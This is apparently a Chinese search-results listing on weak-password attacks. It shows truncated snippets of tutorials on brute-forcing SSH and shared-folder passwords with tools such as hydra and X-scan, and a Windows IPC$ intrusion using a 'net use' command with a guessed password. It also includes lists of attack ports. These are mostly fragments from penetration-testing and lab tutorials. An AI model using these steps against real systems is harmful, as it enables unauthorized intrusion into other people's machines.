    更新漏洞补丁对于一个网络管理员来说是非常重要的。更新补丁,可以进一步保证系统的安全。



    好了,我想我要说的也就大概这些了吧。由于时间关系,个人经验经历也有限,限于篇幅,这里可能有些方面没有说到的。有什么不清楚的地方,或者可以补充的地方。请来
    http://www.hookbase.com/和我们一起交流。
    请来
    http://www.hookbase.com/和我们一起交流。

    展开全文
  • 目前,帐号仍然是最主要的用户身份认证方式,但由于安全意识的淡漠,很多人仍在使用弱口令。而一旦泄漏,所有安全防范机制都将形同虚设。 本课程《用户口令审计》是『Kali Linux工具大全』技术系列的第5部分。向大家...
  • 2、对诸如admin、123456等的弱口令进行暴力破解。 实话实说,第二种办法相当奏效。实际使用的密码为Passw0rd,大写的P,数字0。这个密码是我手动试出来的,因为大多数IT员工在设置账户密码时需要包含至少1位大写...
  • 渗透测试——SSH弱口令暴破0x02

    万次阅读 2018-09-04 20:42:09
    本文由Tahir所写,转载请注明出处:... 【信息收集】 一、测试对象 攻击机:kali-linux-2017.3-vm-amd64 IP:10.10.10.130 靶机:OWASP Broken Web Apps v0.94 IP:10.10.10.129 二、测试工具 ...
  • 终端及登录控制2.1 禁止 root 用户登录2.2 禁止普通用户登录二、弱口令检测与端口扫描1.弱口令检测——John the Ripper1.1 下载并且安装 John the Ripper1.2 检测弱口令账号1.3 使用密码字典文件2.网络扫描——NMAP1...
  • [吐]IPC弱口令入侵图文详解

    千次阅读 2011-06-13 15:50:00
    IPC是很老很老的一个伎俩了,为了给公司的客服展示一下,空口令,和弱口令的危害,于是有此文! 过程:1.依次点【开始】->【运行】, 输入cmd回车2.打开IPC$链接[这里使用虚拟机,192.168.0.62,账号administrator...
  • 看我如何在赛门铁克邮件安全网关上实现弱口令到RCE漏洞执行 ...
  • 作为管理员,您还可以手动停用某个帐户或共享某个角色的所有用户的帐户。有关说明,请参见 手动锁定帐户 。但是,密码策略的一个重要部分就是指定目录服务器在什么情况下锁定帐户,而 不 需要您的干预。 首先,您...
  • 弱口令低安全性的电脑的入侵步骤: 1、X-san工具扫出某个一个网段上所存在的弱口号电脑。如果administraor/123456 2、建立空连接 cmd 打开命令端: net use \\192.168.73.204\ipc$ "123456" /user:"adm
  • 弱口令扫描 弱口令扫描,例如对于mysql,vnc,rdp,http管理登录等弱口令进入的服务,可以使用一些弱口令扫描工具,xscan,hydra,medusa,nmap等。也可以自己找到更多更好的工具 hydra 1.先用nmap扫描开发了哪些...
  • 1、概述 2、系统弱口令检测 七、namp命令 总结 引言 在我们日常生活中,大家都会为我们各种账号设置密码,那我们为什么要设置密码呢?显然我们是为了安全,在我们linux 中也需要为类似的安全保护,来保证我们的数据...
  • 针对口令认证系统中用户频繁重复使用同一弱口令的问题,提出一种基于服务器与便携移动设备间秘密共享的单一口令认证方法,允许远程用户使用单一口令和多个在线服务进行安全认证,且客户端PC无需存储用户的任何秘密...
  • 在Windows操作系统渗透过程中,除了SQL注入、Web服务漏洞攻击等方式外,还有一种攻击方式,即暴力破解,对3389或者内网的服务器进行口令扫描攻击,以获取更多的服务器权限。这种攻击尤其是在拥有一台或者多台服务器...
  • 口令扫描攻击有两种方式 一种是不知道用户名称,猜测性暴力攻击 另一种是通过各种工具或手段收集用户信息,利用收集的信息实施攻击 口令扫描获取用户的账号名称方法 利用网络工具获取: 可以利用目标主机的...
  • 简单口令入侵

    千次阅读 2012-08-17 11:44:44
    其实“口令入侵”这个主题网上有很多现成的教程,我在这里把它整理一下。不管是破解FTP口令还是TELNET口令,最终的目的都是为了取得系统控制权,成为administrators/root用户。对windows2000/NT来说,获得其管理员...
  • 这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,...这篇文章将分享APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。希望文章对您有所帮助~
  • 红队常用攻击套路

    2021-05-06 10:57:55
    在红队的实战过程中,红队专家们逐渐摸出了一些套路、总结了一些经验:有后台或登录入口的,会尽量尝试通过弱口令等方式进入系统;找不到系统漏洞时,会尝试社工钓鱼,从人开展突破;有安全防护设备的,会尽量少用或...
  • SMBCrack2的口令破解与psexec.exe的使用

    千次阅读 2019-08-07 22:17:19
    SMBCrack2的口令破解与psexec.exe的使用 ...SMBCrack2是基于Windows 操作系统的口令破解工具,与以往的SMB(共享)暴力破解工具不同,没有采用系统的API,而是使用了SMB的协议。 SMB协议在Windows ...
  • 前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,...
  • 【网络与系统安全实验】口令破解及防御 口令的历史与现状 20世纪80年代,当计算机开始在公司里广泛应用时,人们很快就意识到需要保护计算机中的信息。仅用userID标识自己,很容易被其他人得到,出于这个考虑,用户...
  • 常见的端口及说明,及攻击方式汇总 文章目录常见的端口及说明,及攻击方式汇总文件共享服务端口远程接口服务端口Web 应用服务端口数据库服务端口邮件服务器端口网络常见...注入、允许匿名访问、弱口令 远程接口服.
  • [译]获取Windows口令

    2014-09-24 23:49:38
    原文地址:https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ ... [b]一)从Windows主机上获取口令:[/b] [color=blue][b]1)注册表[/b][/color] 获得一份SYST...
  • 黑客攻击常用端口

    千次阅读 2019-04-17 17:51:05
    黑客攻击常用端口 端口 服务 入侵方式 21 ftp/tftp/vsftpd文件传输协议 ... 爆破/嗅探/弱口令 25 SMTP邮件服务 邮件伪造 53 DNS域名解析系统 域传送/劫持/缓存投毒/欺骗 ...
  • 1 常用端口信息 1.1 文件共享服务端口 端口号 端口说明 攻击方向 21/22/69 ... 注入、允许匿名访问、弱口令 1.2 远程连接服务端口 端口号 端口说明 攻击方向 22 S...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 4,608
精华内容 1,843
关键字:

共享弱口令攻击